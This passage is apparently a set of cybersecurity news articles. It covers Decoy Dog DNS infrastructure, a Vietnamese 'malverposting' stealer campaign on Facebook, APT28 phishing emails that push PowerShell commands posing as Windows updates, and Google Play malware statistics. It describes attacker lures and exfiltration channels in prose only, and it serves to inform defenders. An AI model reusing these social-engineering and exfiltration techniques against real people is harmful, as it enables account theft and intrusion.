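Lowering min_period makes the 30-second poller show up as well, which is why the period floor matters as much as the jitter bound.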

"Decoy Dog domains can be grouped together based on their shared registrars, name servers, IPs, and dynamic DNS providers," Infoblox said.

"Given the other commonalities between Decoy Dog domains, this is indicative of either one threat actor gradually evolving their tactics, or multiple threat actors deploying the same toolkit on different infrastructure."


Vietnamese Threat Actor Infects 500,000 Devices Using 'Malverposting' Tactics
1.5.23  Virus  The Hacker News
A Vietnamese threat actor has been identified as being behind a "malverposting" campaign on social media platforms that has infected over 500,000 devices worldwide over the past three months to deliver variants of information stealers such as S1deload Stealer and SYS01stealer.

Malverposting refers to the use of promoted social media posts on services like Facebook and Twitter to mass propagate malicious software and other security threats. The idea is to reach a broader audience by paying for ads to "amplify" their posts.

According to Guardio Labs, such attacks commence with the adversary creating new business profiles and hijacking already popular accounts to serve ads that claim to offer free adult-rated photo album downloads.

Within these ZIP archive files are purported images that are actually executable files, which, when clicked, activate the infection chain and ultimately deploy the stealer malware to siphon session cookies, account data, and other information.

The attack chain is highly effective as it creates a "vicious circle" wherein the information plundered using the stealer is used to create an ever-expanding army of hijacked Facebook bot accounts that are then used to push more sponsored posts, effectively scaling the scheme further.

To slip under the radar of Facebook, the threat actor has been found to pass off the newly generated business profile pages as photographer accounts. A majority of the infections have been reported in Australia, Canada, India, the U.K., and the U.S.

The method through which the PHP-based stealer is deployed is said to be constantly evolving to incorporate more detection evasion features, suggesting that the threat actor behind the campaign is actively refining and retooling their tactics in response to public disclosures.

"The malicious payload is quite sophisticated and varies all the time, introducing new evasive techniques," Guardio Labs security researcher Nati Tal said.

The findings come as Group-IB revealed details of an ongoing phishing operation that's aimed at Facebook users by tricking them into entering their credentials on fake copycat sites designed to steal their account credentials and take over the profiles.

In a related development, Malwarebytes unearthed a malvertising campaign that has been found to trick users searching for games and food recipes on Google to serve malicious ads that redirect them to fake websites created on Weebly with the goal of conducting a tech support scam.


APT28 Targets Ukrainian Government Entities with Fake "Windows Update" Emails
1.5.23  APT  The Hacker News
The Computer Emergency Response Team of Ukraine (CERT-UA) has warned of cyber attacks perpetrated by Russian nation-state hackers targeting various government bodies in the country.

The agency attributed the phishing campaign to APT28, which is also known by the names Fancy Bear, Forest Blizzard, FROZENLAKE, Iron Twilight, Sednit, and Sofacy.

The email messages come with the subject line "Windows Update" and purportedly contain instructions in the Ukrainian language to run a PowerShell command under the pretext of security updates.

Running the script loads and executes a next-stage PowerShell script that's designed to collect basic system information through commands like tasklist and systeminfo, and exfiltrate the details via an HTTP request to a Mocky API.

To trick the targets into running the command, the emails impersonated system administrators of the targeted government entities using fake Microsoft Outlook email accounts created with the employees' real names and initials.

CERT-UA is recommending that organizations restrict users' ability to run PowerShell scripts and monitor network connections to the Mocky API.

The disclosure comes weeks after APT28 was tied to attacks exploiting now-patched security flaws in networking equipment to conduct reconnaissance and deploy malware against select targets.

Google's Threat Analysis Group (TAG), in an advisory published last month, detailed a credential harvesting operation carried out by the threat actor to redirect visitors of Ukrainian government websites to phishing domains.

Russia-based hacking crews have also been linked to the exploitation of a critical privilege escalation flaw in Microsoft Outlook (CVE-2023-23397, CVSS score: 9.8) in intrusions directed against the government, transportation, energy, and military sectors in Europe.

The development also comes as Fortinet FortiGuard Labs uncovered a multi-stage phishing attack that leverages a macro-laced Word document supposedly from Ukraine's Energoatom as a lure to deliver the open source Havoc post-exploitation framework.

"It remains highly likely that Russian intelligence, military, and law enforcement services have a longstanding, tacit understanding with cybercriminal threat actors," cybersecurity firm Recorded Future said in a report earlier this year.

"In some cases, it is almost certain that these agencies maintain an established and systematic relationship with cybercriminal threat actors, either by indirect collaboration or via recruitment."


Google Blocks 1.43 Million Malicious Apps, Bans 173,000 Bad Accounts in 2022
1.5.23  Android  The Hacker News
Google disclosed that its improved security features and app review processes helped it block 1.43 million bad apps from being published to the Play Store in 2022.

In addition, the company said it banned 173,000 bad accounts and fended off over $2 billion in fraudulent and abusive transactions through developer-facing features like Voided Purchases API, Obfuscated Account ID, and Play Integrity API.

The addition of identity verification methods such as phone number and email address to join Google Play contributed to a reduction in accounts used to publish apps that go against its policies, Google pointed out.

The search behemoth further said it "prevented about 500K submitted apps from unnecessarily accessing sensitive permissions over the past 3 years."

"In 2022, the App Security Improvements program helped developers fix ~500K security weaknesses affecting ~300K apps with a combined install base of approximately 250B installs," it noted.

In contrast, Google blocked 1.2 million policy-violating apps from being published and banned 190,000 bad accounts in 2021.

The development comes weeks after Google enacted a new data deletion policy that requires app developers to offer a "readily discoverable option" to users from both within an app and outside of it.

Despite these efforts from Google, cybercriminals are continuing to find ways around the app storefront's security protections and publish malicious and adware apps.

Case in point, McAfee's Mobile Research Team discovered 38 games masquerading as Minecraft that have been installed by no less than 35 million users worldwide, primarily located in the U.S., Canada, South Korea, and Brazil.

These gaming apps, while offering the promised functionality, have been found to incorporate the HiddenAds malware to stealthily load ads in the background to generate illicit revenue for their operators.

Some of the most downloaded apps are as follows -

Block Box Master Diamond (com.good.robo.game.builder.craft.block)
Craft Sword Mini Fun (com.craft.world.fairy.fun.everyday.block)
Block Box Skyland Sword (com.skyland.pet.realm.block.rain.craft)
Craft Monster Crazy Sword (com.skyland.fun.block.game.monster.craft)
Block Pro Forrest Diamond (com.monster.craft.block.fun.robo.fairy)

"One of the most accessible content for young people using mobile devices is games," McAfee said. "Malware authors are also aware of this and try to hide their malicious features inside games."

Complicating the problem is the surge in Android banking malware that can be weaponized by threat actors to gain access to victim devices and harvest personal information.

Another emerging trend is the use of binding services to trojanize legitimate applications and conceal a rogue APK payload. This technique has been adopted by bad actors to distribute an Android botnet dubbed DAAM, Cyble said.

The malware, once installed, establishes a connection with a remote server to perform a wide range of nefarious actions, including acting as ransomware by encrypting files stored on the device using a password retrieved from the server.

DAAM also abuses Android's accessibility services to monitor users' activity, thereby allowing it to log keystrokes, record VoIP calls from instant messaging apps, collect browser history, call logs, photos, screenshots, and SMS messages, run arbitrary code, and open phishing URLs.

"Malware authors often leverage genuine applications to distribute malicious code to avoid suspicion," the cybersecurity firm said in an analysis published last month.

The findings also follow an advisory from CloudSEK, which discovered that several popular Android applications like Canva, LinkedIn, Strava, Telegram, and WhatsApp do not invalidate or revalidate session cookies after app data is transferred from one device to another.

While this attack scenario requires an adversary to have physical access to a target's phone, it could allow for account takeover and grant an adversary unauthorized access to confidential data.

To mitigate such threats, it's advised to enable two-factor authentication (2FA) to add an extra layer of account protection, scrutinize app permissions, secure devices with a password, and avoid leaving them unattended in public places.